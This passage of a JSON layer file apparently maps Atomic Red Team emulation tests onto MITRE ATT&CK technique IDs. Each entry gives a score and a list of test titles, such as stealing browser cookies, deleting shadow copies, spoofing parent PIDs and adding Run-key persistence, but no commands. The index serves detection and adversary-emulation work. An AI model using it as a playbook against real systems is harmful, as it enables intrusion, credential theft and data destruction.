Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1113/T1113.md"}]},{"techniqueID":"T1114","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114/T1114.md"}]},{"techniqueID":"T1114.001","score":1,"enabled":true,"comment":"\n- Email Collection with PowerShell Get-Inbox\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114.001/T1114.001.md"}]},{"techniqueID":"T1115","score":3,"enabled":true,"comment":"\n- Utilize Clipboard to store or execute commands from\n- Execute Commands from Clipboard using PowerShell\n- Collect Clipboard Data via VBA\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1115/T1115.md"}]},{"techniqueID":"T1119","score":4,"enabled":true,"comment":"\n- Automated Collection Command Prompt\n- Automated Collection PowerShell\n- Recon information for export with PowerShell\n- Recon information for export with Command Prompt\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1119/T1119.md"}]},{"techniqueID":"T1120","score":2,"enabled":true,"comment":"\n- Win32_PnPEntity Hardware Inventory\n- WinPwn - printercheck\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1120/T1120.md"}]},{"techniqueID":"T1123","score":2,"enabled":true,"comment":"\n- using device audio capture commandlet\n- Registry artefact when application use microphone\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1123/T1123.md"}]},{"techniqueID":"T1124","score":4,"enabled":true,"comment":"\n- System Time Discovery\n- System Time Discovery - PowerShell\n- System Time Discovery W32tm as a Delay\n- System Time with Windows time Command\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1124/T1124.md"}]},{"techniqueID":"T1125","score":1,"enabled":true,"comment":"\n- Registry artefact when application use webcam\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1125/T1125.md"}]},{"techniqueID":"T1127","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1127/T1127.md"}],"comment":"\n- Lolbin Jsc.exe compile javascript to exe\n- Lolbin Jsc.exe compile javascript to dll\n"},{"techniqueID":"T1127.001","score":2,"enabled":true,"comment":"\n- MSBuild Bypass Using Inline Tasks (C#)\n- MSBuild Bypass Using Inline Tasks (VB)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1127.001/T1127.001.md"}]},{"techniqueID":"T1129","score":1,"enabled":true,"comment":"\n- ESXi - Install a custom VIB on an ESXi host\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1129/T1129.md"}]},{"techniqueID":"T1132","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1132/T1132.md"}]},{"techniqueID":"T1132.001","score":1,"enabled":true,"comment":"\n- XOR Encoded data.\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1132.001/T1132.001.md"}]},{"techniqueID":"T1133","score":1,"enabled":true,"comment":"\n- Running Chrome VPN Extensions via the Registry 2 vpn extension\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1133/T1133.md"}]},{"techniqueID":"T1134","score":12,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134/T1134.md"}]},{"techniqueID":"T1134.001","score":4,"enabled":true,"comment":"\n- Named pipe client impersonation\n- `SeDebugPrivilege` token duplication\n- Launch NSudo Executable\n- Bad Potato\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.001/T1134.001.md"}]},{"techniqueID":"T1134.002","score":2,"enabled":true,"comment":"\n- Access Token Manipulation\n- WinPwn - Get SYSTEM shell - Pop System Shell using Token Manipulation technique\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.002/T1134.002.md"}]},{"techniqueID":"T1134.004","score":5,"enabled":true,"comment":"\n- Parent PID Spoofing using PowerShell\n- Parent PID Spoofing - Spawn from Current Process\n- Parent PID Spoofing - Spawn from Specified Process\n- Parent PID Spoofing - Spawn from svchost.exe\n- Parent PID Spoofing - Spawn from New Process\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.004/T1134.004.md"}]},{"techniqueID":"T1134.005","score":1,"enabled":true,"comment":"\n- Injection SID-History with mimikatz\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.005/T1134.005.md"}]},{"techniqueID":"T1135","score":7,"enabled":true,"comment":"\n- Network Share Discovery command prompt\n- Network Share Discovery PowerShell\n- View available share drives\n- Share Discovery with PowerView\n- PowerView ShareFinder\n- WinPwn - shareenumeration\n- Network Share Discovery via dir command\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1135/T1135.md"}]},{"techniqueID":"T1136","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136/T1136.md"}]},{"techniqueID":"T1136.001","score":4,"enabled":true,"comment":"\n- Create a new user in a command prompt\n- Create a new user in PowerShell\n- Create a new Windows admin user\n- Create a new Windows admin user via .NET\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.001/T1136.001.md"}]},{"techniqueID":"T1136.002","score":3,"enabled":true,"comment":"\n- Create a new Windows domain admin user\n- Create a new account similar to ANONYMOUS LOGON\n- Create a new Domain Account using PowerShell\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.002/T1136.002.md"}]},{"techniqueID":"T1137","score":9,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137/T1137.md"}],"comment":"\n- Office Application Startup - Outlook as a C2\n"},{"techniqueID":"T1137.001","score":1,"enabled":true,"comment":"\n- Injecting a Macro into the Word Normal.dotm Template for Persistence via PowerShell\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.001/T1137.001.md"}]},{"techniqueID":"T1137.002","score":1,"enabled":true,"comment":"\n- Office Application Startup Test Persistence (HKCU)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.002/T1137.002.md"}]},{"techniqueID":"T1137.004","score":1,"enabled":true,"comment":"\n- Install Outlook Home Page Persistence\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.004/T1137.004.md"}]},{"techniqueID":"T1137.006","score":5,"enabled":true,"comment":"\n- Code Executed Via Excel Add-in File (XLL)\n- Persistent Code Execution Via Excel Add-in File (XLL)\n- Persistent Code Execution Via Word Add-in File (WLL)\n- Persistent Code Execution Via Excel VBA Add-in File (XLAM)\n- Persistent Code Execution Via PowerPoint VBA Add-in File (PPAM)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.006/T1137.006.md"}]},{"techniqueID":"T1140","score":2,"enabled":true,"comment":"\n- Deobfuscate/Decode Files Or Information\n- Certutil Rename and Decode\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1140/T1140.md"}]},{"techniqueID":"T1176","score":5,"enabled":true,"comment":"\n- Chrome/Chromium (Developer Mode)\n- Chrome/Chromium (Chrome Web Store)\n- Firefox\n- Edge Chromium Addon - VPN\n- Google Chrome Load Unpacked Extension With Command Line\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1176/T1176.md"}]},{"techniqueID":"T1187","score":2,"enabled":true,"comment":"\n- PetitPotam\n- WinPwn - PowerSharpPack - Retrieving NTLM Hashes without Touching LSASS\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1187/T1187.md"}]},{"techniqueID":"T1195","score":1,"enabled":true,"comment":"\n- Octopus Scanner Malware Open Source Supply Chain\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1195/T1195.md"}]},{"techniqueID":"T1197","score":4,"enabled":true,"comment":"\n- Bitsadmin Download (cmd)\n- Bitsadmin Download (PowerShell)\n- Persist, Download, & Execute\n- Bits download using desktopimgdownldr.exe (cmd)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1197/T1197.md"}]},{"techniqueID":"T1201","score":5,"enabled":true,"comment":"\n- Examine local password policy - Windows\n- Examine domain password policy - Windows\n- Get-DomainPolicy with PowerView\n- Enumerate Active Directory Password Policy with get-addefaultdomainpasswordpolicy\n- Use of SecEdit.exe to export the local security policy (including the password policy)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1201/T1201.md"}]},{"techniqueID":"T1202","score":3,"enabled":true,"comment":"\n- Indirect Command Execution - pcalua.exe\n- Indirect Command Execution - forfiles.exe\n- Indirect Command Execution - conhost.exe\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1202/T1202.md"}]},{"techniqueID":"T1204","score":12,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1204/T1204.md"}]},{"techniqueID":"T1204.002","score":11,"enabled":true,"comment":"\n- OSTap Style Macro Execution\n- OSTap Payload Download\n- Maldoc choice flags command execution\n- OSTAP JS version\n- Office launching .bat file from AppData\n- Excel 4 Macro\n- Headless Chrome code execution via VBA\n- Potentially Unwanted Applications (PUA)\n- Office Generic Payload Download\n- LNK Payload Download\n- Mirror Blast Emulation\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1204.002/T1204.002.md"}]},{"techniqueID":"T1204.003","score":1,"enabled":true,"comment":"\n- Malicious Execution from Mounted ISO Image\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1204.003/T1204.003.md"}]},{"techniqueID":"T1207","score":1,"enabled":true,"comment":"\n- DCShadow (Active Directory)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1207/T1207.md"}]},{"techniqueID":"T1216","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1216/T1216.md"}],"comment":"\n- SyncAppvPublishingServer Signed Script PowerShell Command Execution\n- manage-bde.wsf Signed Script Command Execution\n"},{"techniqueID":"T1216.001","score":1,"enabled":true,"comment":"\n- PubPrn.vbs Signed Script Bypass\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1216.001/T1216.001.md"}]},{"techniqueID":"T1217","score":4,"enabled":true,"comment":"\n- List Google Chrome / Opera Bookmarks on Windows with powershell\n- List Google Chrome / Edge Chromium Bookmarks on Windows with command prompt\n- List Mozilla Firefox bookmarks on Windows with command prompt\n- List Internet Explorer Bookmarks using the command prompt\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1217/T1217.md"}]},{"techniqueID":"T1218","score":78,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218/T1218.md"}],"comment":"\n- mavinject - Inject DLL into running process\n- Register-CimProvider - Execute evil dll\n- InfDefaultInstall.exe .inf Execution\n- ProtocolHandler.exe Downloaded a Suspicious File\n- Microsoft.Workflow.Compiler.exe Payload Execution\n- Renamed Microsoft.Workflow.Compiler.exe Payload Executions\n- Invoke-ATHRemoteFXvGPUDisablementCommand base test\n- DiskShadow Command Execution\n- Load Arbitrary DLL via Wuauclt (Windows Update Client)\n- Lolbin Gpscript logon option\n- Lolbin Gpscript startup option\n- Lolbas ie4uinit.exe use as proxy\n- LOLBAS CustomShellHost to Spawn Process\n- Provlaunch.exe Executes Arbitrary Command via Registry Key\n- LOLBAS Msedge to Spawn Process\n"},{"techniqueID":"T1218.001","score":8,"enabled":true,"comment":"\n- Compiled HTML Help Local Payload\n- Compiled HTML Help Remote Payload\n- Invoke CHM with default Shortcut Command Execution\n- Invoke CHM with InfoTech Storage Protocol Handler\n- Invoke CHM Simulate Double click\n- Invoke CHM with Script Engine and Help Topic\n- Invoke CHM Shortcut Command with ITS and Help Topic\n- Decompile Local CHM File\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.001/T1218.001.md"}]},{"techniqueID":"T1218.002","score":1,"enabled":true,"comment":"\n- Control Panel Items\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.002/T1218.002.md"}]},{"techniqueID":"T1218.003","score":2,"enabled":true,"comment":"\n- CMSTP Executing Remote Scriptlet\n- CMSTP Executing UAC Bypass\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.003/T1218.003.md"}]},{"techniqueID":"T1218.004","score":8,"enabled":true,"comment":"\n- CheckIfInstallable method call\n- InstallHelper method call\n- InstallUtil class constructor method call\n- InstallUtil Install method call\n- InstallUtil Uninstall method call - /U variant\n- InstallUtil Uninstall method call - '/installtype=notransaction /action=uninstall' variant\n- InstallUtil HelpText method call\n- InstallUtil evasive invocation\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.004/T1218.004.md"}]},{"techniqueID":"T1218.005","score":10,"enabled":true,"comment":"\n- Mshta executes JavaScript Scheme Fetch Remote Payload With GetObject\n- Mshta executes VBScript to execute malicious command\n- Mshta Executes Remote HTML Application (HTA)\n- Invoke HTML Application - Jscript Engine over Local UNC Simulating Lateral Movement\n- Invoke HTML Application - Jscript Engine Simulating Double Click\n- Invoke HTML Application - Direct download from URI\n- Invoke HTML Application - JScript Engine with Rundll32 and Inline Protocol Handler\n- Invoke HTML Application - JScript Engine with Inline Protocol Handler\n- Invoke HTML Application - Simulate Lateral Movement over UNC Path\n- Mshta used to Execute PowerShell\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.005/T1218.005.md"}]},{"techniqueID":"T1218.007","score":11,"enabled":true,"comment":"\n- Msiexec.exe - Execute Local MSI file with embedded JScript\n- Msiexec.exe - Execute Local MSI file with embedded VBScript\n- Msiexec.exe - Execute Local MSI file with an embedded DLL\n- Msiexec.exe - Execute Local MSI file with an embedded EXE\n- WMI Win32_Product Class - Execute Local MSI file with embedded JScript\n- WMI Win32_Product Class - Execute Local MSI file with embedded VBScript\n- WMI Win32_Product Class - Execute Local MSI file with an embedded DLL\n- WMI Win32_Product Class - Execute Local MSI file with an embedded EXE\n- Msiexec.exe - Execute the DllRegisterServer function of a DLL\n- Msiexec.exe - Execute the DllUnregisterServer function of a DLL\n- Msiexec.exe - Execute Remote MSI file\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.007/T1218.007.md"}]},{"techniqueID":"T1218.008","score":2,"enabled":true,"comment":"\n- Odbcconf.exe - Execute Arbitrary DLL\n- Odbcconf.exe - Load Response File\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.008/T1218.008.md"}]},{"techniqueID":"T1218.009","score":2,"enabled":true,"comment":"\n- Regasm Uninstall Method Call Test\n- Regsvcs Uninstall Method Call Test\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.009/T1218.009.md"}]},{"techniqueID":"T1218.010","score":5,"enabled":true,"comment":"\n- Regsvr32 local COM scriptlet execution\n- Regsvr32 remote COM scriptlet execution\n- Regsvr32 local DLL execution\n- Regsvr32 Registering Non DLL\n- Regsvr32 Silent DLL Install Call DllRegisterServer\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.010/T1218.010.md"}]},{"techniqueID":"T1218.011","score":14,"enabled":true,"comment":"\n- Rundll32 execute JavaScript Remote Payload With GetObject\n- Rundll32 execute VBscript command\n- Rundll32 execute VBscript command using Ordinal number\n- Rundll32 advpack.dll Execution\n- Rundll32 ieadvpack.dll Execution\n- Rundll32 syssetup.dll Execution\n- Rundll32 setupapi.dll Execution\n- Execution of HTA and VBS Files using Rundll32 and URL.dll\n- Launches an executable using Rundll32 and pcwutl.dll\n- Execution of non-dll using rundll32.exe\n- Rundll32 with Ordinal Value\n- Rundll32 with Control_RunDLL\n- Rundll32 with desk.cpl\n- Running DLL with .init extension and function\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.011/T1218.011.md"}]},{"techniqueID":"T1219","score":12,"enabled":true,"comment":"\n- TeamViewer Files Detected Test on Windows\n- AnyDesk Files Detected Test on Windows\n- LogMeIn Files Detected Test on Windows\n- GoToAssist Files Detected Test on Windows\n- ScreenConnect Application Download and Install on Windows\n- Ammyy Admin Software Execution\n- RemotePC Software Execution\n- NetSupport - RAT Execution\n- UltraViewer - RAT Execution\n- UltraVNC Execution\n- MSP360 Connect Execution\n- RustDesk Files Detected Test on Windows\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1219/T1219.md"}]},{"techniqueID":"T1220","score":4,"enabled":true,"comment":"\n- MSXSL Bypass using local files\n- MSXSL Bypass using remote files\n- WMIC bypass using local XSL file\n- WMIC bypass using remote XSL file\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1220/T1220.md"}]},{"techniqueID":"T1221","score":1,"enabled":true,"comment":"\n- WINWORD Remote Template Injection\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1221/T1221.md"}]},{"techniqueID":"T1222","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222/T1222.md"}]},{"techniqueID":"T1222.001","score":5,"enabled":true,"comment":"\n- Take ownership using takeown utility\n- cacls - Grant permission to specified user or group recursively\n- attrib - Remove read-only attribute\n- attrib - hide file\n- Grant Full Access to folder for Everyone - Ryuk Ransomware Style\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.001/T1222.001.md"}]},{"techniqueID":"T1482","score":8,"enabled":true,"comment":"\n- Windows - Discover domain trusts with dsquery\n- Windows - Discover domain trusts with nltest\n- Powershell enumerate domains and forests\n- Adfind - Enumerate Active Directory OUs\n- Adfind - Enumerate Active Directory Trusts\n- Get-DomainTrust with PowerView\n- Get-ForestTrust with PowerView\n- TruffleSnout - Listing AD Infrastructure\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1482/T1482.md"}]},{"techniqueID":"T1484","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1484/T1484.md"}]},{"techniqueID":"T1484.001","score":2,"enabled":true,"comment":"\n- LockBit Black - Modify Group policy settings -cmd\n- LockBit Black - Modify Group policy settings -Powershell\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1484.001/T1484.001.md"}]},{"techniqueID":"T1485","score":2,"enabled":true,"comment":"\n- Windows - Overwrite file with SysInternals SDelete\n- Overwrite deleted data on C drive\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1485/T1485.md"}]},{"techniqueID":"T1486","score":3,"enabled":true,"comment":"\n- PureLocker Ransom Note\n- Data Encrypted with GPG4Win\n- Data Encrypt Using DiskCryptor\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1486/T1486.md"}]},{"techniqueID":"T1489","score":3,"enabled":true,"comment":"\n- Windows - Stop service using Service Controller\n- Windows - Stop service using net.exe\n- Windows - Stop service by killing process\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1489/T1489.md"}]},{"techniqueID":"T1490","score":11,"enabled":true,"comment":"\n- Windows - Delete Volume Shadow Copies\n- Windows - Delete Volume Shadow Copies via WMI\n- Windows - wbadmin Delete Windows Backup Catalog\n- Windows - Disable Windows Recovery Console Repair\n- Windows - Delete Volume Shadow Copies via WMI with PowerShell\n- Windows - Delete Backup Files\n- Windows - wbadmin Delete systemstatebackup\n- Windows - Disable the SR scheduled task\n- Disable System Restore Through Registry\n- Windows - vssadmin Resize Shadowstorage Volume\n- Modify VSS Service Permissions\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1490/T1490.md"}]},{"techniqueID":"T1491","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1491/T1491.md"}]},{"techniqueID":"T1491.001","score":2,"enabled":true,"comment":"\n- Replace Desktop Wallpaper\n- Configure LegalNoticeCaption and LegalNoticeText registry keys to display ransom message\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1491.001/T1491.001.md"}]},{"techniqueID":"T1497","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497/T1497.md"}]},{"techniqueID":"T1497.001","score":2,"enabled":true,"comment":"\n- Detect Virtualization Environment (Windows)\n- Detect Virtualization Environment via WMI Manufacturer/Model Listing (Windows)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497.001/T1497.001.md"}]},{"techniqueID":"T1505","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505/T1505.md"}]},{"techniqueID":"T1505.002","score":1,"enabled":true,"comment":"\n- Install MS Exchange Transport Agent Persistence\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.002/T1505.002.md"}]},{"techniqueID":"T1505.003","score":1,"enabled":true,"comment":"\n- Web Shell Written to Disk\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.003/T1505.003.md"}]},{"techniqueID":"T1505.004","score":2,"enabled":true,"comment":"\n- Install IIS Module using AppCmd.exe\n- Install IIS Module using PowerShell Cmdlet New-WebGlobalModule\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.004/T1505.004.md"}]},{"techniqueID":"T1505.005","score":2,"enabled":true,"comment":"\n- Simulate Patching termsrv.dll\n- Modify Terminal Services DLL Path\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.005/T1505.005.md"}]},{"techniqueID":"T1518","score":12,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518/T1518.md"}],"comment":"\n- Find and Display Internet Explorer Browser Version\n- Applications Installed\n- WinPwn - Dotnetsearch\n- WinPwn - DotNet\n- WinPwn - powerSQL\n"},{"techniqueID":"T1518.001","score":7,"enabled":true,"comment":"\n- Security Software Discovery\n- Security Software Discovery - powershell\n- Security Software Discovery - Sysmon Service\n- Security Software Discovery - AV Discovery via WMI\n- Security Software Discovery - AV Discovery via Get-CimInstance and Get-WmiObject cmdlets\n- Security Software Discovery - Windows Defender Enumeration\n- Security Software Discovery - Windows Firewall Enumeration\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518.001/T1518.001.md"}]},{"techniqueID":"T1529","score":3,"enabled":true,"comment":"\n- Shutdown System - Windows\n- Restart System - Windows\n- Logoff System - Windows\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1529/T1529.md"}]},{"techniqueID":"T1531","score":3,"enabled":true,"comment":"\n- Change User Password - Windows\n- Delete User - Windows\n- Remove Account From Domain Admin Group\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1531/T1531.md"}]},{"techniqueID":"T1539","score":2,"enabled":true,"comment":"\n- Steal Firefox Cookies (Windows)\n- Steal Chrome Cookies (Windows)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1539/T1539.md"}]},{"techniqueID":"T1543","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543/T1543.md"}]},{"techniqueID":"T1543.003","score":6,"enabled":true,"comment":"\n- Modify Fax service to run PowerShell\n- Service Installation CMD\n- Service Installation PowerShell\n- TinyTurla backdoor service w64time\n- Remote Service Installation CMD\n- Modify Service to Run Arbitrary Binary (Powershell)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.003/T1543.003.md"}]},{"techniqueID":"T1546","score":27,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546/T1546.md"}],"comment":"\n- Persistence with Custom AutodialDLL\n- HKLM - Persistence using CommandProcessor AutoRun key (With Elevation)\n- HKCU - Persistence using CommandProcessor AutoRun key (Without Elevation)\n- WMI Invoke-CimMethod Start Process\n"},{"techniqueID":"T1546.001","score":1,"enabled":true,"comment":"\n- Change Default File Association\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.001/T1546.001.md"}]},{"techniqueID":"T1546.002","score":1,"enabled":true,"comment":"\n- Set Arbitrary Binary as Screensaver\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.002/T1546.002.md"}]},{"techniqueID":"T1546.003","score":3,"enabled":true,"comment":"\n- Persistence via WMI Event Subscription - CommandLineEventConsumer\n- Persistence via WMI Event Subscription - ActiveScriptEventConsumer\n- Windows MOFComp.exe Load MOF File\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.003/T1546.003.md"}]},{"techniqueID":"T1546.007","score":1,"enabled":true,"comment":"\n- Netsh Helper DLL Registration\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.007/T1546.007.md"}]},{"techniqueID":"T1546.008","score":4,"enabled":true,"comment":"\n- Attaches Command Prompt as a Debugger to a List of Target Processes\n- Replace binary of sticky keys\n- Create Symbolic Link From osk.exe to cmd.exe\n- Atbroker.exe (AT) Executes Arbitrary Command via Registry Key\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.008/T1546.008.md"}]},{"techniqueID":"T1546.009","score":1,"enabled":true,"comment":"\n- Create registry persistence via AppCert DLL\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.009/T1546.009.md"}]},{"techniqueID":"T1546.010","score":1,"enabled":true,"comment":"\n- Install AppInit Shim\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.010/T1546.010.md"}]},{"techniqueID":"T1546.011","score":3,"enabled":true,"comment":"\n- Application Shim Installation\n- New shim database files created in the default shim database directory\n- Registry key creation and/or modification events for SDB\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.011/T1546.011.md"}]},{"techniqueID":"T1546.012","score":3,"enabled":true,"comment":"\n- IFEO Add Debugger\n- IFEO Global Flags\n- GlobalFlags in Image File Execution Options\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.012/T1546.012.md"}]},{"techniqueID":"T1546.013","score":1,"enabled":true,"comment":"\n- Append malicious start-process cmdlet\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.013/T1546.013.md"}]},{"techniqueID":"T1546.015","score":4,"enabled":true,"comment":"\n- COM Hijacking - InprocServer32\n- Powershell Execute COM Object\n- COM Hijacking with RunDLL32 (Local Server Switch)\n- COM hijacking via TreatAs\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.015/T1546.015.md"}]},{"techniqueID":"T1547","score":38,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547/T1547.md"}],"comment":"\n- Add a driver\n"},{"techniqueID":"T1547.001","score":17,"enabled":true,"comment":"\n- Reg Key Run\n- Reg Key RunOnce\n- PowerShell Registry RunOnce\n- Suspicious vbs file run from startup Folder\n- Suspicious jse file run from startup Folder\n- Suspicious bat file run from startup Folder\n- Add Executable Shortcut Link to User Startup Folder\n- Add persistance via Recycle bin\n- SystemBC Malware-as-a-Service Registry\n- Change Startup Folder - HKLM Modify User Shell Folders Common Startup Value\n- Change Startup Folder - HKCU Modify User Shell Folders 